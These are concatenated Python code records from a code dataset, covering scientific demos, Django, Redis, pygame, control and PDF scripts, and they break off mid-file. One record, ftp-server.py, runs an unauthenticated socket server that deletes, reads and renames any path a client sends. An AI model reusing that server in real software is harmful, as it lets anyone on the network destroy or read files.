space\n\n# Create linear algebra solver\nH = BiharmonicSolver(matrices)\n\n# Solve and transform to real space\nu_hat = H(f_hat, u_hat) # Solve\n\n#H = la.SolverGeneric1ND(matrices)\n#u_hat = H(f_hat, u_hat)\n\nuq = u_hat.backward()\n\n# Compare with analytical solution\nuj = Array(T, buffer=ue)\nprint(abs(uj-uq).max())\nassert np.allclose(uj, uq, 1e-8)\n\nif 'pytest' not in os.environ:\n import matplotlib.pyplot as plt\n plt.figure()\n X = T.local_mesh(True) # With broadcasting=True the shape of X is local_shape, even though the number of datapoints are still the same as in 1D\n plt.contourf(X[0], X[1], uq)\n plt.colorbar()\n\n plt.figure()\n plt.contourf(X[0], X[1], uj)\n plt.colorbar()\n\n plt.figure()\n plt.contourf(X[0], X[1], uq-uj)\n plt.colorbar()\n plt.title('Error')\n #plt.show()\n","sub_path":"demo/biharmonic2D.py","file_name":"biharmonic2D.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"234513014","text":"import importlib\nimport sys\nimport os\nimport pdb\nimport logging\n\nfrom .version import __version__\n\ntry:\n basestring\nexcept NameError:\n basestring = str\n\nfrom . import agents\nfrom .simulation import *\nfrom .environment import Environment\nfrom .history import History\nfrom . import utils\nfrom . import analysis\n\ndef main():\n import argparse\n from . import simulation\n\n logging.basicConfig(level=logging.INFO)\n logging.info('Running SOIL version: {}'.format(__version__))\n\n parser = argparse.ArgumentParser(description='Run a SOIL simulation')\n parser.add_argument('file', type=str,\n nargs=\"?\",\n default='simulation.yml',\n help='python module containing the simulation configuration.')\n parser.add_argument('--module', '-m', type=str,\n help='file containing the code of any custom agents.')\n parser.add_argument('--dry-run', '--dry', action='store_true',\n help='Do not store the results of the simulation.')\n parser.add_argument('--pdb', action='store_true',\n help='Use a pdb console in case of exception.')\n parser.add_argument('--graph', '-g', action='store_true',\n help='Dump GEXF graph. Defaults to false.')\n parser.add_argument('--csv', action='store_true',\n help='Dump history in CSV format. Defaults to false.')\n parser.add_argument('--output', '-o', type=str, default=\"soil_output\",\n help='folder to write results to. It defaults to the current directory.')\n parser.add_argument('--synchronous', action='store_true',\n help='Run trials serially and synchronously instead of in parallel. Defaults to false.')\n\n args = parser.parse_args()\n\n if os.getcwd() not in sys.path:\n sys.path.append(os.getcwd())\n if args.module:\n importlib.import_module(args.module)\n\n logging.info('Loading config file: {}'.format(args.file))\n\n try:\n dump = []\n if not args.dry_run:\n if args.csv:\n dump.append('csv')\n if args.graph:\n dump.append('gexf')\n simulation.run_from_config(args.file,\n dry_run=args.dry_run,\n dump=dump,\n parallel=(not args.synchronous),\n results_dir=args.output)\n except Exception:\n if args.pdb:\n pdb.post_mortem()\n else:\n raise\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"soil/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"591715513","text":"#!/usr/local/bin/python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-05-04 11:03\n# Last modified: 2017-05-04 14:25\n# Filename: main.py\n# Description:\nimport json\nimport csv\n\nimport redis\n\n\nBLOCK_FILE = 'data/GeoLiteCity-Blocks.csv'\nCITY_FILE = 'data/GeoLiteCity-Location.csv'\n\n\ndef ip_to_score(ip_addr):\n score = 0\n for v in ip_addr.split('.'):\n score = score * 256 + int(v, 10)\n return score\n\n\ndef import_ips_to_redis(conn, filename):\n if conn.exists('ip2cityid:'):\n return\n csv_file = csv.reader(open(filename))\n for count, row in enumerate(csv_file):\n start_ip = row[0] if row else ''\n if 'i' in start_ip.lower():\n continue\n if '.' in start_ip:\n start_ip = ip_to_score(start_ip)\n elif start_ip.isdigit():\n start_ip = int(start_ip, 10)\n else:\n continue\n\n city_id = row[2] + '_' + str(count)\n conn.zadd('ip2cityid:', city_id, start_ip)\n\n\ndef import_cities_to_redis(conn, filename):\n if conn.exists('cityid2city:'):\n return\n csv_file = csv.reader(open(filename))\n for count, row in enumerate(csv_file):\n if len(row) < 4 or not row[0].isdigit():\n continue\n city_id = row[0]\n country = row[1]\n region = row[2]\n city = row[3]\n conn.hset('cityid2city:', city_id,\n json.dumps([city, region, country]))\n\n\ndef find_city_by_ip(conn, ip_addr):\n if isinstance(ip_addr, str):\n ip_addr = ip_to_score(ip_addr)\n city_id = conn.zrevrangebyscore(\n 'ip2cityid:', ip_addr, 0, start=0, num=1)\n if not city_id:\n return None\n city_id = city_id[0].split('_')[0]\n return json.loads(conn.hget('cityid2city:', city_id))\n\n\ndef tests(conn, ip_list):\n for ip in ip_list:\n print(find_city_by_ip(conn, ip))\n\n\ndef main():\n conn = redis.Redis(decode_responses=True)\n import_ips_to_redis(conn, BLOCK_FILE)\n import_cities_to_redis(conn, CITY_FILE)\n ip_list = ['202.118.67.200', '59.46.92.105', '8.8.8.8']\n tests(conn, ip_list)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Redis/GeoIp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"603363887","text":"import socket\r\nimport os\r\nimport shutil\r\n'''\r\npwd - показывает название рабочей директории\r\nls - показывает содержимое текущей директории\r\ncat <filename> - отправляет содержимое файла\r\nmkdir <directoryname> - создает директорию\r\nrmdir <directoryname> - удаляет директорию\r\nremove <filename> - удаляет путь к файлу\r\nrename <filename> - переименовывает файл\r\n'''\r\n\r\ndirname = os.path.join(os.getcwd(), 'docs')\r\n\r\ndef process(req):\r\n \r\n rq = req.split()\r\n \r\n if req == 'pwd':\r\n return dirname\r\n \r\n elif req == 'ls':\r\n return '; '.join(os.listdir(dirname))\r\n \r\n elif 'cat' in req:\r\n \twith open(rq[1]) as file:\r\n \t\treturn file.read()\r\n \r\n elif 'mkdir' in req: \t\r\n \treturn os.mkdir(rq[1])\r\n \r\n elif 'rmdir' in req:\r\n \treturn shutil.rmtree(rq[1])\r\n \r\n elif 'remove' in req:\r\n \tpath = os.path.join(os.path.abspath(os.path.dirname(__file__)), rq[1])\r\n \treturn os.remove(path)\r\n \r\n elif 'rename' in req:\r\n \treturn os.rename(rq[1], rq[2])\r\n \r\n else:\r\n \treturn 'Please, check the entered data and try again.'\r\n\r\n\r\nPORT = 6666\r\n\r\nsock = socket.socket()\r\nsock.bind(('', PORT))\r\nsock.listen()\r\nprint(\"Прослушиваем порт\", PORT)\r\n\r\nwhile True:\r\n conn, addr = sock.accept()\r\n \r\n request = conn.recv(1024).decode()\r\n print(request)\r\n \r\n response = process(request)\r\n \r\n if (request=='pwd') or (request=='ls') or ('cat' in request):\r\n \tconn.send(response.encode())\r\n elif ('mkdir' in request) or ('rmdir' in request) or ('remove' in request) or ('rename' in request):\r\n \tconn.send('Your request is fulfilled'.encode())\r\n else:\r\n \tconn.send(response.encode())\r\n\r\nconn.close()\r\n","sub_path":"ftp-server.py","file_name":"ftp-server.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"601108024","text":"# Create your views here.\nfrom django.http import HttpResponse\nfrom core import models\nfrom django.shortcuts import get_object_or_404, render_to_response, redirect\nfrom django.template import RequestContext\nfrom django import forms\nfrom datetime import date\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nimport datetime\nfrom django.forms import ModelForm\nimport json\nfrom django.views.decorators.http import require_http_methods, require_POST, require_GET\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\n\n\n#################\n##### FORMS #####\n#################\nclass TaskForm(ModelForm):\n class Meta:\n model = models.Task\n fields = ['name', 'dueDate']\n\nclass TagForm(ModelForm):\n class Meta:\n model = models.Tag\n # fields = ['name', 'dueDate']\n\n#################\n##### VIEWS #####\n#################\n\ndef index(request):\n # show tasks if authenticated\n if request.user.is_authenticated():\n user = request.user\n num_of_days = 6\n data = {'days': getStuffForDay(user, num_of_days),\n 'tags': models.Tag.objects.filter(user=user),\n 'new_tag_form': TagForm()\n }\n return render_to_response(\"tasksView.html\", data, context_instance=RequestContext(request)) \n \n # otherwise show homepage\n else:\n data = {'projectName': 'todos',\n 'successMessage': \"Great success!\",\n 'login_form': AuthenticationForm,\n 'new_user_form': UserCreationForm \n }\n return render_to_response(\"index.html\", data, context_instance=RequestContext(request))\n\n\n@require_POST\ndef doLogin(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/')\n else:\n raise Http404\n else:\n raise Http404\n\ndef doLogout(request):\n logout(request)\n return redirect('/')\n\n\n# shows the page dedicated to a particular task\n# def taskView(request, taskID):\n# return None\n\n# def addTagToTask(request, taskID, tagID):\n# return None\n\n# def removeTagFromTask(request, taskID, tagID):\n# return None\n\n# def changeTaskDueDate(request, taskID, dueDate):\n# return None\n\n# def deleteTask(request, taskID):\n# return None\n\n@require_POST\n@login_required(login_url='/')\ndef newTask(request):\n # taskID, name, tags=None,\n # dueDate, repeating=None, parentTask=None\n # name = request.POST['name']\n # dueDate = request.POST['dueDate']\n user = request.user\n\n # task = models.Task(name=name, dueDate = dueDate, user=user)\n task = models.Task(user=user)\n form = TaskForm(request.POST, instance=task)\n # task.user = user\n form.save()\n return JSONResponse({'success': True})\n\n# def markTaskCompleted(request, taskID, dateCompleted=date.today()):\n# return None\n\n# # shows a view for all of the tags\n# def getTags(request):\n# return None\n\n# def deleteTag(request):\n# return None\n\n# def createTag(request):\n# return None\n\n\n\n###################\n##### HELPERS #####\n###################\n\ndef getStuffForDay(user, num_of_days):\n days = []\n today = datetime.date.today()\n for x in xrange(num_of_days):\n date = today + datetime.timedelta(days=x)\n ghostTasks = models.GhostTask.filterForUserAndDay(user, date)\n\n if x==0: \n tasks = models.Task.objects.filter(user=user, dueDate__lte=today, complete=False)\n else:\n tasks = models.Task.objects.filter(user=user, dueDate=date, complete=False)\n\n \n new_task_form = TaskForm(initial={'dueDate': date})\n new_task_form.fields['dueDate'].widget = forms.HiddenInput()\n\n day = {\n 'date': date, \n 'tasks': tasks,\n 'ghostTasks': ghostTasks,\n 'new_task_form': new_task_form\n\n }\n days.append(day)\n return days\n\n\ndef JSONResponse(obj):\n return HttpResponse(json.dumps(obj),\n content_type=\"application/json\")\n\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"236547841","text":"import pygame\nimport context.api as ctx\n\nfrom mitsuki.util import blur_surface\nfrom mitsuki.scenes import Scene\n\n\nclass DialogScene(Scene):\n def __init__(self, parent, title=None, subtitle=None, allow_exit='no'):\n super(DialogScene, self).__init__(parent)\n\n self.title = title\n self.subtitle = subtitle\n self.allow_exit = allow_exit\n\n self.background = pygame.Surface(self.parent.display_size)\n if len(self.parent.scenes) > 0:\n blurred = blur_surface(self.parent.scenes[-1].surface)\n self.background.blit(blurred, (0, 0))\n\n def update(self):\n ctx.log_endok(\"Scene(%s).update\" % self.__class__.__name__)\n self.create_surface()\n self.surface.blit(self.background, (0, 0))\n\n surfwidth, surfheight = self.parent.display_size\n\n title_height_per_line = 0\n subtitle_height_per_line = 0\n title_lines = []\n subtitle_lines = []\n\n ctx.log_start(\"splitting lines\")\n\n if self.title is not None:\n title_text_lines = self.title.split(\"\\n\")\n for line in title_text_lines:\n l = self.parent.font['title'].render(line, True, pygame.Color(self.parent.colors['text']))\n\n if l.get_height() > title_height_per_line:\n title_height_per_line = l.get_height()\n\n title_lines.append(l)\n\n if self.subtitle is not None:\n subtitle_text_lines = self.subtitle.split(\"\\n\")\n for line in subtitle_text_lines:\n l = self.parent.font['normal'].render(line, True, pygame.Color(self.parent.colors['text']))\n\n if l.get_height() > subtitle_height_per_line:\n subtitle_height_per_line = l.get_height()\n\n subtitle_lines.append(l)\n\n ctx.log_endok(\"splitting lines\")\n\n padding = 20\n between_text_padding = 2\n\n calcheight = (\n padding + \n (title_height_per_line * len(title_lines)) +\n (between_text_padding * max(len(title_lines) - 1, 0)) + \n (padding if (len(title_lines) != 0 and len(title_lines) != 0) else 0)+\n (subtitle_height_per_line * len(subtitle_lines)) + \n (between_text_padding * max(len(subtitle_lines) - 1, 0)) +\n padding\n )\n\n messagesurface = pygame.Surface((surfwidth, calcheight))\n messagesurface.fill(pygame.Color(self.parent.colors['highlight']))\n\n current_y = padding\n\n ctx.log_start(\"blitting lines\")\n\n for i, line in enumerate(title_lines):\n pos = (((surfwidth / 2) - (line.get_width() / 2)), current_y)\n messagesurface.blit(line, pos)\n current_y += title_height_per_line\n if i != len(title_lines) - 1:\n current_y += between_text_padding\n\n if len(title_lines) is not 0 and len(subtitle_lines) is not 0:\n current_y += padding\n\n for i, line in enumerate(subtitle_lines):\n pos = (((surfwidth / 2) - (line.get_width() / 2)), current_y)\n messagesurface.blit(line, pos)\n current_y += subtitle_height_per_line\n if i < len(subtitle_lines) - 1:\n current_y += between_text_padding\n\n ctx.log_endok(\"blitting lines\")\n\n messagesurfacepos = (0, ((surfheight / 2) - (messagesurface.get_height() / 2)))\n self.surface.blit(messagesurface, messagesurfacepos)\n\n ctx.log_endok(\"Scene(%s).update\" % self.__class__.__name__)\n\n def handle_event(self, event):\n ctx.log_start(\"Scene(%s).handle_event\" % self.__class__.__name__)\n\n if event.type == pygame.KEYDOWN:\n if self.allow_exit == 'any':\n self.parent.scene_pop()\n elif self.allow_exit == 'escape':\n if event.key == pygame.K_ESCAPE:\n self.parent.scene_pop()\n\n ctx.log_endok(\"Scene(%s).handle_event\" % self.__class__.__name__)\n","sub_path":"mitsuki/scenes/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"223722334","text":"# Controller using the linear reactor model measuring both concentration and temperature.\n\nimport closedloop_scenarios_single.closedloop_params\nimport src.LQR as LQR\nimport src.LLDS as LLDS\nimport scipy.stats\nimport src.MPC as MPC\nimport src.Results as Results\nimport numpy\nimport matplotlib.pyplot as plt\n\ntend = 80\nparams = closedloop_scenarios_single.closedloop_params.Params(tend) # end time of simulation\n\n# Get the linear model\nlinsystems = params.cstr_model.get_nominal_linear_systems(params.h) # cstr_model comes from params.jl\nopoint = 1 # the specific operating point we are going to use for control\n\ninit_state = numpy.array([0.55, 450]) # random initial point near operating point\n\n# Set the state space model\nA = linsystems[opoint].A\nB = linsystems[opoint].B\nb = linsystems[opoint].b # offset from the origin\n\n# Set point\nysp = linsystems[opoint].op[0] - b[0] # Medium concentration\nH = numpy.matrix([1, 0]) # only attempt to control the concentration\nx_off, usp = LQR.offset(A, numpy.matrix(B), params.C2, H, numpy.array([ysp])) # control offset\nysp = x_off\nusp = numpy.array([usp])\n\n# Set up the KF\nkf_cstr = LLDS.LLDS(A, B, params.C2, params.Q, params.R2) # set up the KF object (measuring both states)\nstate_noise_dist = scipy.stats.multivariate_normal(cov=params.Q)\nmeas_noise_dist = scipy.stats.multivariate_normal(cov=params.R2)\n\n# First time step of the simulation\nparams.xs[:, 0] = init_state - b # set simulation starting point to the random initial state\nparams.ys2[:, 0] = params.C2 @ params.xs[:, 0] + meas_noise_dist.rvs() # measure from actual plant\ntemp = kf_cstr.init_filter(init_state-b, params.init_state_covar, params.ys2[:, 0]-b) # filter\nparams.kfmeans[:, 0], params.kfcovars[:, :, 0] = temp\n\nhorizon = 150\nparams.us[0] = MPC.mpc_lqr(params.kfmeans[:, 0], horizon, A, numpy.matrix(B),\n params.QQ, params.RR, numpy.array([0, 0]), numpy.array([0.0])) # get the controller input\n\nfor t in range(1, params.N):\n params.xs[:, t] = params.cstr_model.run_reactor(params.xs[:, t-1], params.us[t-1], params.h)\n params.xs[:, t] += state_noise_dist.rvs()\n\n params.ys2[:, t] = params.C2 @ params.xs[:, t] + meas_noise_dist.rvs() # measure from actual plant\n temp = kf_cstr.step_filter(params.kfmeans[:, t - 1], params.kfcovars[:, :, t - 1], params.us[t - 1],\n params.ys2[:, t]-b)\n params.kfmeans[:, t], params.kfcovars[:, :, t] = temp\n\n # Compute controller action\n if t % 10 == 0:\n params.us[t] = MPC.mpc_lqr(params.kfmeans[:, t], horizon, A,\n numpy.matrix(B), params.QQ, params.RR,\n numpy.array([0, 0]), numpy.array([0.0])) # get the controller input\n if params.us[t] is None or numpy.isnan(params.us[t]):\n break\n else:\n params.us[t] = params.us[t - 1]\n\nfor i in range(len(params.kfmeans[0])):\n params.kfmeans[:, i] += b\n\n# Plot the results\nResults.plot_tracking1(params.ts, params.xs, params.ys2, params.kfmeans, params.us, 2, ysp[0] + b[0])\nResults.calc_error1(params.xs, ysp[0] + b[0])\nResults.calc_energy(params.us, 0.0)\nplt.show()\n","sub_path":"closedloop_scenarios_single/nonlin_mod_lqg.py","file_name":"nonlin_mod_lqg.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"81568600","text":"#!/usr/bin/python3.7\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/20 13:42\n# @Email : jtyoui@qq.com\n# @Software: PyCharm\nfrom jtyoui.error import LibraryNotInstallError\nfrom jtyoui.tools import pips\nimport os\nimport glob\n\ntry:\n import fitz # 安装 pip install PyMuPDF\nexcept ModuleNotFoundError:\n try:\n fitz = pips('fitz', 'PyMuPDF') # 自动安装\n except ModuleNotFoundError:\n raise LibraryNotInstallError(\"安装 pip install PyMuPDF\")\n\n\ndef _get_dir_name(file_dir):\n base_name = os.path.basename(file_dir) # 获得地址的文件名\n dir_name = os.path.dirname(file_dir) # 获得地址的父链接\n return dir_name, base_name\n\n\ndef image_pdf(file_dir, pdf_address=None):\n \"\"\"\n 照片转pdf\n :param file_dir: 照片的地址文件夹\n :param pdf_address: 保存pdf的文件地址,默认是当前地址\n :return: 成功返回True\n \"\"\"\n dir_name, base_name = _get_dir_name(file_dir)\n doc = fitz.Document()\n for img in sorted(glob.glob(file_dir + '\\\\*'), key=os.path.getmtime): # 排序获得对象\n img_doc = fitz.Document(img) # 获得图片对象\n pdf_bytes = img_doc.convertToPDF() # 获得图片流对象\n img_pdf = fitz.Document(\"pdf\", pdf_bytes) # 将图片流创建单个的PDF文件\n doc.insertPDF(img_pdf) # 将单个文件插入到文档\n img_doc.close()\n img_pdf.close()\n if not pdf_address:\n doc.save(dir_name + os.sep + base_name + \".pdf\") # 保存文档\n else:\n doc.save(pdf_address + \".pdf\") # 保存文档\n doc.close()\n return True\n\n\ndef pdf_image(pdf_address, image_dir=None):\n \"\"\"\n PDF转照片\n :param pdf_address: PDF文件地址\n :param image_dir: 照片的文件夹地址\n :return: 成功返回True\n \"\"\"\n dir_name, base_name = _get_dir_name(pdf_address)\n pdf = fitz.Document(pdf_address)\n for pg in range(0, pdf.pageCount):\n page = pdf[pg] # 获得每一页的对象\n trans = fitz.Matrix(1.0, 1.0).preRotate(0)\n pm = page.getPixmap(matrix=trans, alpha=False) # 获得每一页的流对象\n if not image_dir:\n pm.writePNG(str(pdf_address[:-4]) + os.sep + str(base_name[:-4]) + '_{:0>4d}.jpg'.format(pg + 1)) # 保存图片\n else:\n pm.writePNG(image_dir + os.sep + str(base_name[:-4]) + '_{:0>4d}.jpg'.format(pg + 1)) # 保存图片\n pdf.close()\n return True\n\n\nif __name__ == '__main__':\n image_pdf(r'D:\\temp') # 将照片转pdf\n pdf_image(r'D:\\temp.pdf') # 将PDF转照片\n","sub_path":"jtyoui/imagepdf/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"619262374","text":"from operator import itemgetter\n\nfrom pyramid_debugtoolbar.panels import DebugPanel\n\n_ = lambda x: x\n\n\nclass PaaSDebugPanel(DebugPanel):\n \"\"\"\n PaaS debug panel\n \"\"\"\n name = 'PaaS'\n has_content = True\n\n def nav_title(self):\n return _('PaaS')\n\n def url(self):\n return ''\n\n def title(self):\n return _('PaaS')\n\n def content(self):\n d = vars(self.request.paas_env)\n if d.get('env'):\n del d['env']\n if d.get('_settings'):\n del d['_settings']\n\n paas_name = d['PAAS_NAME']\n\n env = [(k, v) for k, v in d.iteritems()]\n return self.render(\n 'pyramid_paas:paas.dbtmako',\n { 'paas': paas_name,\n 'env': sorted(env, key=itemgetter(0))},\n self.request\n )\n\n\ndef includeme(config):\n settings = config.registry.settings\n if 'debugtoolbar.panels' in settings:\n settings['debugtoolbar.panels'].append(PaaSDebugPanel)\n if not 'mako.directories' in settings:\n settings['mako.directories'] = []\n","sub_path":"pyramid_paas/panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216735039","text":"# coding=utf-8\n# date: 2018-5-29,15:48:26\n# name: smz\n\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\ndef sin_gif():\n \"\"\"\n 练习gif生成\n :return:\n \"\"\"\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n x = np.linspace(0, 2*np.pi, 200)\n y = np.sin(x)\n line_sin, = ax.plot(x, y, label='sin(x)')\n dot, = ax.plot([], [], 'ro')\n\n def init(ax=ax, line_sin=line_sin):\n ax.set_xlim(0, 2*np.pi)\n ax.set_ylim(-1, 1)\n return line_sin\n\n\n def gen_dot(): # 返回用于每帧更新的数值\n for i in np.linspace(0, 2*np.pi, 200):\n new_dot = [i, np.sin(i)]\n yield new_dot # 这里返回要跟新的数据\n\n def update_dot(new_dot, dot=dot): # 使用数值更新artist,并且返回artist\n dot.set_data(new_dot[0], new_dot[1])\n return dot\n\n ani = animation.FuncAnimation(fig=fig, func=update_dot,\n frames=gen_dot, interval=10,\n init_func=init, save_count=200)\n # 这句有点疑问,原本frames是接受一个\n # int类型的属性值,但是如果接受一个\n # int类型的话,那么update_dot就\n # 就无法使用索引了,因为传入的参数不对\n\n ani.save('./saves/sin_dot.gif', writer='imagemagick', fps=100)\n plt.show()\n\n\nif __name__ == '__main__':\n sin_gif()\n\n\n","sub_path":"Matplotlib/animation_gif.py","file_name":"animation_gif.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"420264707","text":"#from keras.datasets import mnist\nfrom keras.models import load_model\n\n#from keras.datasets import mnist\nimport csv\nimport numpy as np\n\nimport sys\n#####################################\n\n# GPU memory limit #\n\n#####################################\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\n#from keras.backend.tensorflow_backend import set_session\n#config = tf.ConfigProto()\n#config.gpu_options.per_process_gpu_memory_fraction = 0.25\n#set_session(tf.Session(config=config))\n\n#<testing data> <prediction file> <mode>\ndef load_test():\n x_test = []\n row_count = 0\n with open(sys.argv[1],'r') as file:\n csvfile = csv.reader(file,delimiter=',')\n for row in csvfile:\n if (row_count!=0):\n x_test.append([])\n x_test[row_count-1]= row[1].split(\" \")\n for i in range(len(x_test[row_count-1])):\n x_test[row_count-1][i]=float(x_test[row_count-1][i])\n row_count +=1\n x_test = np.array(x_test).reshape(-1,48,48,1)\n\n x_test = x_test/255\n return (x_test)\n\nx_test = load_test()\n\nif sys.argv[3]=='public':\n\tmodel = load_model(\"model69.h5\")\nelif sys.argv[3]=='private':\n\tmodel = load_model(\"model68.h5\")\n\n#model = load_model(\"model69.h5\")\n\n\ny_test=model.predict(x_test)\ny_test=np.argmax(y_test,axis=-1)\nwith open(sys.argv[2],'w') as f:\n print(\"id,label\",file=f)\n print('\\n'.join(['{},{}'.format(i, p) for (i, p) in enumerate(y_test)]), file=f)\n \n\nprint (\"\\n Test Accuracy:\")#,result)\n\n\n\n\n","sub_path":"hw3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"359668958","text":"from random import randint\r\n\r\n\r\ndef is_int(x):\r\n if x[0] == \"-\":\r\n return x[1:].isdigit()\r\n else:\r\n return x.isdigit()\r\n\r\nm = input(\"Введіть розмір матриці A(m×m), m > 1\\nm = \")\r\ndown_num, up_num = input(\"Введіть мінімальне ціле значення числа у матриці: \"), input(\"та максимальне ціле значення: \")\r\n\r\nif m.isdigit() and int(m) > 1 and is_int(down_num) and is_int(up_num):\r\n m = int(m)\r\n s = (\"{:\"+str(max(len(down_num), len(up_num))+3)+\"}\")*m\r\n down_num, up_num = int(down_num), int(up_num)\r\n if up_num > down_num:\r\n A = [[randint(down_num, up_num) for i in range(m)] for k in range(m)]\r\n print(\"Згенерована матриця:\")\r\n for i in A:\r\n print(s.format(*i))\r\n\r\n B = zip(*(sorted(A[i], reverse=True) for i in range(m)))\r\n print(\"Сформована нова матриця:\")\r\n for i in B:\r\n print(s.format(*i))\r\n else:\r\n print(\"Максимальне значення повине бути більше мінімального\")\r\nelse:\r\n print(\"m повина бути цілим числом більше 1, а числа - цілими\")\r\n","sub_path":"I семестр/Програмування (Python)/Лабораторні/Лисенко 6116/Python/Лабораторна 4/Завдання 2.py","file_name":"Завдання 2.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"57238905","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pprint\r\n\r\nres = requests.get(\"https://news.ycombinator.com/news\")\r\nres2 = requests.get(\"https://news.ycombinator.com/news?p2\")\r\n#print(res.text)\r\nsoup = BeautifulSoup(res.text,'html.parser')\r\nsoup2 = BeautifulSoup(res2.text, 'html.parser')\r\n#print(soup.body.contents)\r\n\r\nlinks = soup.select('.storylink')\r\nlinks2 = soup2.select('.storylink')\r\nsubtext = soup.select('.subtext')\r\nsubtext2 = soup2.select('.subtext')\r\n#print(links)\r\n\r\nmega_link = links + links2\r\nmega_subtext = subtext + subtext2\r\n\r\ndef sorted_by_votes(hnlist):\r\n return sorted(hnlist,key= lambda k:k['vote'],reverse=True)\r\n\r\ndef create_custom_hn(links,subtext):\r\n hn=[]\r\n for idx,item in enumerate(links):\r\n title = links[idx].getText()\r\n href = links[idx].get('href', None)\r\n vote = subtext[idx].select('.score')\r\n if len(vote):\r\n points = int(vote[0].getText().replace(' points',''))\r\n if points>99:\r\n hn.append({'title':title, 'href':href, 'vote': points})\r\n return sorted_by_votes(hn)\r\n\r\npprint.pprint(create_custom_hn(mega_link,mega_subtext))","sub_path":"scrp.py","file_name":"scrp.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"20281229","text":"import numpy as np\n\ndef MLP(X,Wh,Wo):\n '''%-----------\n %INITIALIZE\n %-----------''';\n a = 1.7159\n b = 2/3.\n N = len(X[0,:]) #%number of training data pts\n bias = -1 # %initial bias value\n O=[]\n X = np.concatenate((bias*np.ones([1,N]) , X),axis=0) #%add zero'th order terms\n H=[]\n for j in range(len(Wh)):\n H.append(len(Wh[j]))\n \n \n '''\n %-----\n %MAIN\n %-----\n\n %-------------------------------------------------\n %PROPAGATE INPUTS FORWARD\n %-------------------------------------------------\n %------------------------\n %HIDDEN LAYER\n %------------------------''';\n \n for j in range(len(H)): #%loop over each hidden layer\n if j==0:\n V = Wh[j]@X #%weighted sum of inputs [1] Eqn(4.29/30)\n else:\n V = Wh[j]@O[j-1] #%weighted sum of hidden inputs [1] Eqn(4.29/31)\n \n PHI = a * np.tanh(b*V) #%acivation function [1] Eqn(4.37)\n O.append( np.concatenate((bias*np.ones([1,N]),PHI),axis=0)) #%add zero'th order terms\n \n\n '''%------------------------\n %OUTPUT LAYER\n %------------------------''';\n V = Wo@O[-1] #%weighted sum of inputs [1] Eqn(4.29)\n Y = a * np.tanh(b*V) #%activation function [1] Eqn(4.37)\n\n return Y\n","sub_path":"EE565/Project4_GarciaJ/codes/requiredFunctions/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"335944540","text":"# 02_del_repeat.py\n\n# 练习:\n# 任意输入一个单词,存入集合中,当输入空字符时结束输入,\n# 1) 打印您输入的单词的种类数(去重)\n# 2) 每个单词都打印在终端上显示\n# 思考:\n# 如何让打印的次序和输入的次序一致?\n \nL = []\n\nwhile True:\n s = input(\"请输入单词:\")\n if not s:\n break\n L.append(s)\n\n\ns = set(L) # 集合可以去重\nprint(\"您共输入%d种单词\" % len(s))\nfor words in s:\n print(words)\n\n#方法1,不用集合\n# L2 = []\n# for x in L:\n# if x not in L2: #如果x没有加入到L2中,说明是第一次出现\n# L2.append(x)\n\n# for x in L2:\n# print(x)\n\n\n\n#方法2,用集合\ns = set(L) #去重\nfor x in L:\n if x in s:\n print(x)\n s.discard(x) #删除已经打印过的","sub_path":"python语法/day8/exercise/02_del_repeat.py","file_name":"02_del_repeat.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"571174294","text":"from flask import Flask\nfrom flask import request, render_template, redirect, url_for, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, 